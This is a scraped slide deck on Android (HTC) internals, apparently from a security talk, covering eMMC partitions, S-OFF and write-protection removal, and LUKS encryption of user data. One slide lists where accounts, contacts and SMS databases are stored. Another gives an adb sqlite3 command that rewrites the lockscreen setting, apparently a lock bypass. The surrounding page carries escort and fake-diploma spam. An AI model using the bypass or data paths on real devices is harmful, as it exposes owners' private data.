SlideShare a Scribd company logo

Android: Behind the scenes

Download as PPTX, PDF
N
Narkozzz
Devices & Hardware
1 of 20
Android behind the scenes possible attacks and radical defense measures
• /dev/block/mmcblk0p1 - 512 000 - dbl • /dev/block/mmcblk0p3 - 4 608 000 - osbl • /dev/block/mmcblk0p4 - 1 024 - header_rex_amss • /dev/block/mmcblk0p5 - 30 720 000 - rex_amss • /dev/block/mmcblk0p6 - 12 800 000 - modem_DSP • /dev/block/mmcblk0p7 - 2 097 152 - CID, Secure_Flag, IMEI, rcdata.img • /dev/block/mmcblk0p8 - 3 145 728 • /dev/block/mmcblk0p9 - 2 097 152 • /dev/block/mmcblk0p10 - 1 048 576 • /dev/block/mmcblk0p11 - 1 048 576 • /dev/block/mmcblk0p12 - 8 961 536 • /dev/block/mmcblk0p13 - 3 145 728 - reserved for modem storage • /dev/block/mmcblk0p14 - 3 145 728 - reserved for modem storage • /dev/block/mmcblk0p15 - 1 048 576 • /dev/block/mmcblk0p16 - 9 172 480 • /dev/block/mmcblk0p17 - 262 144 - misc • /dev/block/mmcblk0p18 - 1 048 576 - hboot • /dev/block/mmcblk0p19 - 1 048 576 - sp1 • /dev/block/mmcblk0p20 - 1 310 720 - wifi • /dev/block/mmcblk0p21 - 8 909 824 - recovery • /dev/block/mmcblk0p22 - 4 194 304 - boot • /dev/block/mmcblk0p23 - 262 144 - mfg • /dev/block/mmcblk0p24 - 2 096 128 - sp2 • /dev/block/mmcblk0p25 - 585 104 896 - system • /dev/block/mmcblk0p26 - 1 232 076 288 - userdata • /dev/block/mmcblk0p27 - 314 572 288 - cache • /dev/block/mmcblk0p28 - 21 757 440 - devlog • /dev/block/mmcblk0p29 - 262 144 - pdata
S-ON S-OFF eMMC read, writing Writing in any eMMC only to user-available partition, except partitions partition 7 Flashing only HTC- Flashing any third- signed firmware party modified firmware, including hboot, recovery and custom roms
mmcblk0p7 CID IMEI S-Flag
IMEI repair S-OFF Unlock
Powercycle Partition7 gfree wpthis.ko eMMC injection •void powercycle_emmc() { gpio_tlmm_config(PCOM_GPIO_CFG(88, 0, GPIO_OUTPUT, GPIO_NO_PULL, GPIO_2MA), 0); // turn off. wpthis.ko gpio_set_value(88, 0); mdelay(200); // turn back on. gpio_set_value(88, 1); mdelay(200); }
drivers/mmc/card/block.c #if 1 #if 0 if (board_emmc_boot()) if (mmc_card_mmc(card)) { if (brq.cmd.arg < 131073) {/* should not write any value before 131073 */ pr_err("%s: pid %d(tgid %d)(%s)n", func, (unsigned)(current->pid), (unsigned)(current->tgid), current->comm); pr_err("ERROR! Attemp to write radio partition start %d size %dn", brq.cmd.arg, blk_rq_sectors(req)); BUG(); return 0; } #endif
Preparations Android 2.3-4.1 • Rooted Android OS, stock or custom Busybox • Android console utility pack installed lm.cryptsetup • Android console LUKS-manager installed USB Debugging Enabled • Access to device’s shell by USB “reboot” binary • Reboot binary from the ROM Manager contents
In the Android Shell: #busybox dd if=/dev/zero of=/data/secure0 bs=1M count 800 #losetup /dev/block/loop3 /data/secure0 #lm.cryptsetup luksFormat –c aes-plain /dev/block/loop3 #lm.cryptsetup luksOpen /dev/block/loop3 data #mke2fs –T ext4 –L Secure0 -F /dev/mapper/data #lm.cryptsetup luksClose data In the CWM Recovery: parted /dev/block/mmcblk1 print rm 1 mkpartfs primary fat32 0 4032 mkpartfs primary ext2 4032 8065 quit In the Android Shell: #lm.cryptsetup luksFormat –c aes-plain /dev/block/mmcblk1p2 #lm.cryptsetup luksOpen /dev/block/mmcblk1p2 sdcard #mkfs.vfat -n Seccard0 /dev/mapper/sdcard #lm.cryptsetup luksClose sdcard
In the Android Shell: #losetup /dev/block/loop3 /data/secure0 #lm.cryptsetup luksOpen /dev/block/loop3 data #mount –o remount,rw / #mkdir /DATA #mount –t ext4 /dev/mapper/data /DATA # cp -a /data/app /DATA # cp -a /data/app-private /DATA # cp -a /data/backup /DATA # cp -a /data/data /DATA # cp -a /data/dontpanic /DATA # cp -a /data/drm /DATA # cp -a /data/etc /DATA # cp -a /data/htcfs /DATA # cp -a /data/local /DATA # cp -a /data/misc /DATA # cp -a /data/property /DATA # cp -a /data/secure /DATA # cp -a /data/system /DATA # cp -a /data/zipalign.log /DATA # mkdir /DATA/d # mkdir /DATA/dalvik-cache # umount /DATA # lm.cryptsetup luksClose data
Entering encrypted mode: #setprop ctl.stop zygote #mount -o remount,rw rootfs / #mkdir /DATA #mkdir /mnt/SDCARD #mount -o move /mnt/sdcard /mnt/SDCARD #lm.cryptsetup luksOpen /dev/block/mmcblk1p2 sdcard #mount -t vfat /dev/mapper/sdcard /mnt/sdcard #mount -o remount,ro rootfs / #mount /dev/block/mmcblk0p26 /DATA #losetup /dev/block/loop5 /DATA/secure0 #lm.cryptsetup luksOpen /dev/block/loop5 data #umount /data -l #mount -t ext4 /dev/mapper/data /data #setprop ctl.start zygote #killall zygote Leaving encrypted mode: #sync #setprop ctl.stop zygote #setprop ctl.stop runtime #setprop ctl.stop keystore #fuser /data –m -k #umount /data #/lm.cryptsetup luksClose data #/system/bin/reboot
CWM S-ON S-OFF ADB #Root /data/ recovery
/data/system/accounts.db /data/data/com.android.providers.contacts/databases/contacts2.db • Contacts • Call history /data/data/com.android.providers.telephony/databases/mmssms.db • Sms
adb shell # sqlite3 /data/data/com.android.providers.settings/databases/settings.db sqlite> update secure set value=65536 where name='lockscreen.password_type'; sqlite> .exit # exit adb reboot
Basic Moderate Recomended • USB • S-ON • Data Debugging • Stock Encryption Disable Firmware • Unknown Sources Off • PinLock
Thank you for listening! See you next time.

Recommended

Optimizing GELI Performance by John-Mark Gurney
Optimizing GELI Performance by John-Mark Gurney Optimizing GELI Performance by John-Mark Gurney
Optimizing GELI Performance by John-Mark Gurneyeurobsdcon
 
망고100 보드로 놀아보자 10
망고100 보드로 놀아보자 10망고100 보드로 놀아보자 10
망고100 보드로 놀아보자 10종인 전
 
Steps to build and run oai
Steps to build and run oaiSteps to build and run oai
Steps to build and run oaissuser38b887
 
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'Positive Hack Days
 
Cannot observe ingress packets
Cannot observe ingress packetsCannot observe ingress packets
Cannot observe ingress packetssoichi shigeta
 
Designof traffic isolationby using flow based tunneling
Designof traffic isolationby using flow based tunnelingDesignof traffic isolationby using flow based tunneling
Designof traffic isolationby using flow based tunnelingsoichi shigeta
 
Multipath
MultipathMultipath
MultipathMichal Sedlak
 
New microsoft word document
New microsoft word documentNew microsoft word document
New microsoft word documentWebmaster
 

Recommended

Optimizing GELI Performance by John-Mark Gurney
Optimizing GELI Performance by John-Mark Gurney Optimizing GELI Performance by John-Mark Gurney
Optimizing GELI Performance by John-Mark Gurneyeurobsdcon
 
망고100 보드로 놀아보자 10
망고100 보드로 놀아보자 10망고100 보드로 놀아보자 10
망고100 보드로 놀아보자 10종인 전
 
Steps to build and run oai
Steps to build and run oaiSteps to build and run oai
Steps to build and run oaissuser38b887
 
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'Positive Hack Days
 
Cannot observe ingress packets
Cannot observe ingress packetsCannot observe ingress packets
Cannot observe ingress packetssoichi shigeta
 
Designof traffic isolationby using flow based tunneling
Designof traffic isolationby using flow based tunnelingDesignof traffic isolationby using flow based tunneling
Designof traffic isolationby using flow based tunnelingsoichi shigeta
 
Multipath
MultipathMultipath
MultipathMichal Sedlak
 
New microsoft word document
New microsoft word documentNew microsoft word document
New microsoft word documentWebmaster
 
Linux SD/MMC device driver
Linux SD/MMC device driverLinux SD/MMC device driver
Linux SD/MMC device driver艾鍗科技
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenLex Yu
 
망고100 보드로 놀아보자 7
망고100 보드로 놀아보자 7망고100 보드로 놀아보자 7
망고100 보드로 놀아보자 7종인 전
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptxssuserb4d806
 
Linux boot-time
Linux boot-timeLinux boot-time
Linux boot-timeAndrea Righi
 
U-Boot presentation 2013
U-Boot presentation 2013U-Boot presentation 2013
U-Boot presentation 2013Wave Digitech
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
HKG15-409: ARM Hibernation enablement on SoCs - a case study
HKG15-409: ARM Hibernation enablement on SoCs - a case studyHKG15-409: ARM Hibernation enablement on SoCs - a case study
HKG15-409: ARM Hibernation enablement on SoCs - a case studyLinaro
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Ron Munitz
 
Study on Android Emulator
Study on Android EmulatorStudy on Android Emulator
Study on Android EmulatorSamael Wang
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяEkaterina Melnik
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NamePositive Hack Days
 
Cgroups in android
Cgroups in androidCgroups in android
Cgroups in androidramalinga prasad tadepalli
 
CUDA lab's slides of "parallel programming" course
CUDA lab's slides of "parallel programming" courseCUDA lab's slides of "parallel programming" course
CUDA lab's slides of "parallel programming" courseShuai Yuan
 
PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22Yuya Takei
 
建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card艾鍗科技
 
MySQL Tokudb engine benchmark
MySQL Tokudb engine benchmarkMySQL Tokudb engine benchmark
MySQL Tokudb engine benchmarkLouis liu
 
9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...
9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...
9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...Pooja Nehwal
 
Gaya Call Girls #9907093804 Contact Number Escorts Service Gaya
Gaya Call Girls #9907093804 Contact Number Escorts Service GayaGaya Call Girls #9907093804 Contact Number Escorts Service Gaya
Gaya Call Girls #9907093804 Contact Number Escorts Service Gayasrsj9000
 

More Related Content

Similar to Android: Behind the scenes

Linux SD/MMC device driver
Linux SD/MMC device driverLinux SD/MMC device driver
Linux SD/MMC device driver艾鍗科技
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenLex Yu
 
망고100 보드로 놀아보자 7
망고100 보드로 놀아보자 7망고100 보드로 놀아보자 7
망고100 보드로 놀아보자 7종인 전
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptxssuserb4d806
 
U-Boot presentation 2013
U-Boot presentation 2013U-Boot presentation 2013
U-Boot presentation 2013Wave Digitech
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
A little systemtap
A little systemtapA little systemtap
A little systemtapyang bingwu
 
HKG15-409: ARM Hibernation enablement on SoCs - a case study
HKG15-409: ARM Hibernation enablement on SoCs - a case studyHKG15-409: ARM Hibernation enablement on SoCs - a case study
HKG15-409: ARM Hibernation enablement on SoCs - a case studyLinaro
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Ron Munitz
 
Study on Android Emulator
Study on Android EmulatorStudy on Android Emulator
Study on Android EmulatorSamael Wang
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяEkaterina Melnik
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NamePositive Hack Days
 
CUDA lab's slides of "parallel programming" course
CUDA lab's slides of "parallel programming" courseCUDA lab's slides of "parallel programming" course
CUDA lab's slides of "parallel programming" courseShuai Yuan
 
PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22Yuya Takei
 
建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card艾鍗科技
 
MySQL Tokudb engine benchmark
MySQL Tokudb engine benchmarkMySQL Tokudb engine benchmark
MySQL Tokudb engine benchmarkLouis liu
 

Similar to Android: Behind the scenes (20)

Linux SD/MMC device driver
Linux SD/MMC device driverLinux SD/MMC device driver
Linux SD/MMC device driver
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
 
망고100 보드로 놀아보자 7
망고100 보드로 놀아보자 7망고100 보드로 놀아보자 7
망고100 보드로 놀아보자 7
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptx
 
Linux boot-time
Linux boot-timeLinux boot-time
Linux boot-time
 
U-Boot presentation 2013
U-Boot presentation 2013U-Boot presentation 2013
U-Boot presentation 2013
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
HKG15-409: ARM Hibernation enablement on SoCs - a case study
HKG15-409: ARM Hibernation enablement on SoCs - a case studyHKG15-409: ARM Hibernation enablement on SoCs - a case study
HKG15-409: ARM Hibernation enablement on SoCs - a case study
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
 
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
 
Study on Android Emulator
Study on Android EmulatorStudy on Android Emulator
Study on Android Emulator
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
 
Cgroups in android
Cgroups in androidCgroups in android
Cgroups in android
 
CUDA lab's slides of "parallel programming" course
CUDA lab's slides of "parallel programming" courseCUDA lab's slides of "parallel programming" course
CUDA lab's slides of "parallel programming" course
 
PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22
 
建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card建構嵌入式Linux系統於SD Card
建構嵌入式Linux系統於SD Card
 
MySQL Tokudb engine benchmark
MySQL Tokudb engine benchmarkMySQL Tokudb engine benchmark
MySQL Tokudb engine benchmark
 

Recently uploaded

9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...
9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...
9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...Pooja Nehwal
 
Gaya Call Girls #9907093804 Contact Number Escorts Service Gaya
Gaya Call Girls #9907093804 Contact Number Escorts Service GayaGaya Call Girls #9907093804 Contact Number Escorts Service Gaya
Gaya Call Girls #9907093804 Contact Number Escorts Service Gayasrsj9000
 
定制加拿大滑铁卢大学毕业证(Waterloo毕业证书)成绩单(文凭)原版一比一
定制加拿大滑铁卢大学毕业证(Waterloo毕业证书)成绩单(文凭)原版一比一定制加拿大滑铁卢大学毕业证(Waterloo毕业证书)成绩单(文凭)原版一比一
定制加拿大滑铁卢大学毕业证(Waterloo毕业证书)成绩单(文凭)原版一比一zul5vf0pq
 
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
Thane Escorts, (Pooja 09892124323), Thane Call Girls
Thane Escorts, (Pooja 09892124323), Thane Call GirlsThane Escorts, (Pooja 09892124323), Thane Call Girls
Thane Escorts, (Pooja 09892124323), Thane Call GirlsPooja Nehwal
 
Hifi Defence Colony Call Girls Service WhatsApp -> 9999965857 Available 24x7 ...
Hifi Defence Colony Call Girls Service WhatsApp -> 9999965857 Available 24x7 ...Hifi Defence Colony Call Girls Service WhatsApp -> 9999965857 Available 24x7 ...
Hifi Defence Colony Call Girls Service WhatsApp -> 9999965857 Available 24x7 ...srsj9000
 
Pallawi 9167673311 Call Girls in Thane , Independent Escort Service Thane
Pallawi 9167673311 Call Girls in Thane , Independent Escort Service ThanePallawi 9167673311 Call Girls in Thane , Independent Escort Service Thane
Pallawi 9167673311 Call Girls in Thane , Independent Escort Service ThanePooja Nehwal
 
Alambagh Call Girl 9548273370 , Call Girls Service Lucknow
Alambagh Call Girl 9548273370 , Call Girls Service LucknowAlambagh Call Girl 9548273370 , Call Girls Service Lucknow
Alambagh Call Girl 9548273370 , Call Girls Service Lucknowmakika9823
 
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...ur8mqw8e
 
Call Girls Service Kolkata Aishwarya 🤌 8250192130 🚀 Vip Call Girls Kolkata
Call Girls Service Kolkata Aishwarya 🤌 8250192130 🚀 Vip Call Girls KolkataCall Girls Service Kolkata Aishwarya 🤌 8250192130 🚀 Vip Call Girls Kolkata
Call Girls Service Kolkata Aishwarya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Russian Call Girls In South Delhi Delhi 9711199012 💋✔💕😘 Independent Escorts D...
Russian Call Girls In South Delhi Delhi 9711199012 💋✔💕😘 Independent Escorts D...Russian Call Girls In South Delhi Delhi 9711199012 💋✔💕😘 Independent Escorts D...
Russian Call Girls In South Delhi Delhi 9711199012 💋✔💕😘 Independent Escorts D...nagunakhan
 
定制宾州州立大学毕业证(PSU毕业证) 成绩单留信学历认证原版一比一
定制宾州州立大学毕业证(PSU毕业证) 成绩单留信学历认证原版一比一定制宾州州立大学毕业证(PSU毕业证) 成绩单留信学历认证原版一比一
定制宾州州立大学毕业证(PSU毕业证) 成绩单留信学历认证原版一比一ga6c6bdl
 
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | DelhiFULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhisoniya singh
 
VIP Call Girls Kavuri Hills ( Hyderabad ) Phone 8250192130 | ₹5k To 25k With ...
VIP Call Girls Kavuri Hills ( Hyderabad ) Phone 8250192130 | ₹5k To 25k With ...VIP Call Girls Kavuri Hills ( Hyderabad ) Phone 8250192130 | ₹5k To 25k With ...
VIP Call Girls Kavuri Hills ( Hyderabad ) Phone 8250192130 | ₹5k To 25k With ...Suhani Kapoor
 
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...Pooja Nehwal
 
Call Girls Delhi {Rs-10000 Laxmi Nagar] 9711199012 Whats Up Number
Call Girls Delhi {Rs-10000 Laxmi Nagar] 9711199012 Whats Up NumberCall Girls Delhi {Rs-10000 Laxmi Nagar] 9711199012 Whats Up Number
Call Girls Delhi {Rs-10000 Laxmi Nagar] 9711199012 Whats Up NumberMs Riya
 
如何办理萨省大学毕业证(UofS毕业证)成绩单留信学历认证原版一比一
如何办理萨省大学毕业证(UofS毕业证)成绩单留信学历认证原版一比一如何办理萨省大学毕业证(UofS毕业证)成绩单留信学历认证原版一比一
如何办理萨省大学毕业证(UofS毕业证)成绩单留信学历认证原版一比一ga6c6bdl
 
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Pooja Nehwal
 

Recently uploaded (20)

9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...
9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...
9892124323 Pooja Nehwal Call Girls Services Call Girls service in Santacruz A...
 
Gaya Call Girls #9907093804 Contact Number Escorts Service Gaya
Gaya Call Girls #9907093804 Contact Number Escorts Service GayaGaya Call Girls #9907093804 Contact Number Escorts Service Gaya
Gaya Call Girls #9907093804 Contact Number Escorts Service Gaya
 
定制加拿大滑铁卢大学毕业证(Waterloo毕业证书)成绩单(文凭)原版一比一
定制加拿大滑铁卢大学毕业证(Waterloo毕业证书)成绩单(文凭)原版一比一定制加拿大滑铁卢大学毕业证(Waterloo毕业证书)成绩单(文凭)原版一比一
定制加拿大滑铁卢大学毕业证(Waterloo毕业证书)成绩单(文凭)原版一比一
 
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
Call Girls in Nagpur Sakshi Call 7001035870 Meet With Nagpur Escorts
 
Thane Escorts, (Pooja 09892124323), Thane Call Girls
Thane Escorts, (Pooja 09892124323), Thane Call GirlsThane Escorts, (Pooja 09892124323), Thane Call Girls
Thane Escorts, (Pooja 09892124323), Thane Call Girls
 
Low rate Call girls in Delhi Justdial | 9953330565
Low rate Call girls in Delhi Justdial | 9953330565Low rate Call girls in Delhi Justdial | 9953330565
Low rate Call girls in Delhi Justdial | 9953330565
 
Hifi Defence Colony Call Girls Service WhatsApp -> 9999965857 Available 24x7 ...
Hifi Defence Colony Call Girls Service WhatsApp -> 9999965857 Available 24x7 ...Hifi Defence Colony Call Girls Service WhatsApp -> 9999965857 Available 24x7 ...
Hifi Defence Colony Call Girls Service WhatsApp -> 9999965857 Available 24x7 ...
 
Pallawi 9167673311 Call Girls in Thane , Independent Escort Service Thane
Pallawi 9167673311 Call Girls in Thane , Independent Escort Service ThanePallawi 9167673311 Call Girls in Thane , Independent Escort Service Thane
Pallawi 9167673311 Call Girls in Thane , Independent Escort Service Thane
 
Alambagh Call Girl 9548273370 , Call Girls Service Lucknow
Alambagh Call Girl 9548273370 , Call Girls Service LucknowAlambagh Call Girl 9548273370 , Call Girls Service Lucknow
Alambagh Call Girl 9548273370 , Call Girls Service Lucknow
 
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
🔝 9953056974🔝 Delhi Call Girls in Ajmeri Gate
 
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
《伯明翰城市大学毕业证成绩单购买》学历证书学位证书区别《复刻原版1:1伯明翰城市大学毕业证书|修改BCU成绩单PDF版》Q微信741003700《BCU学...
 
Call Girls Service Kolkata Aishwarya 🤌 8250192130 🚀 Vip Call Girls Kolkata
Call Girls Service Kolkata Aishwarya 🤌 8250192130 🚀 Vip Call Girls KolkataCall Girls Service Kolkata Aishwarya 🤌 8250192130 🚀 Vip Call Girls Kolkata
Call Girls Service Kolkata Aishwarya 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Russian Call Girls In South Delhi Delhi 9711199012 💋✔💕😘 Independent Escorts D...
Russian Call Girls In South Delhi Delhi 9711199012 💋✔💕😘 Independent Escorts D...Russian Call Girls In South Delhi Delhi 9711199012 💋✔💕😘 Independent Escorts D...
Russian Call Girls In South Delhi Delhi 9711199012 💋✔💕😘 Independent Escorts D...
 
定制宾州州立大学毕业证(PSU毕业证) 成绩单留信学历认证原版一比一
定制宾州州立大学毕业证(PSU毕业证) 成绩单留信学历认证原版一比一定制宾州州立大学毕业证(PSU毕业证) 成绩单留信学历认证原版一比一
定制宾州州立大学毕业证(PSU毕业证) 成绩单留信学历认证原版一比一
 
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | DelhiFULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
FULL ENJOY - 8264348440 Call Girls in Hauz Khas | Delhi
 
VIP Call Girls Kavuri Hills ( Hyderabad ) Phone 8250192130 | ₹5k To 25k With ...
VIP Call Girls Kavuri Hills ( Hyderabad ) Phone 8250192130 | ₹5k To 25k With ...VIP Call Girls Kavuri Hills ( Hyderabad ) Phone 8250192130 | ₹5k To 25k With ...
VIP Call Girls Kavuri Hills ( Hyderabad ) Phone 8250192130 | ₹5k To 25k With ...
 
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
WhatsApp 9892124323 ✓Call Girls In Khar ( Mumbai ) secure service - Bandra F...
 
Call Girls Delhi {Rs-10000 Laxmi Nagar] 9711199012 Whats Up Number
Call Girls Delhi {Rs-10000 Laxmi Nagar] 9711199012 Whats Up NumberCall Girls Delhi {Rs-10000 Laxmi Nagar] 9711199012 Whats Up Number
Call Girls Delhi {Rs-10000 Laxmi Nagar] 9711199012 Whats Up Number
 
如何办理萨省大学毕业证(UofS毕业证)成绩单留信学历认证原版一比一
如何办理萨省大学毕业证(UofS毕业证)成绩单留信学历认证原版一比一如何办理萨省大学毕业证(UofS毕业证)成绩单留信学历认证原版一比一
如何办理萨省大学毕业证(UofS毕业证)成绩单留信学历认证原版一比一
 
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
Call Girls In Andheri East Call 9892124323 Book Hot And Sexy Girls,
 

Android: Behind the scenes

  • 1. Android behind the scenes possible attacks and radical defense measures
  • 2.
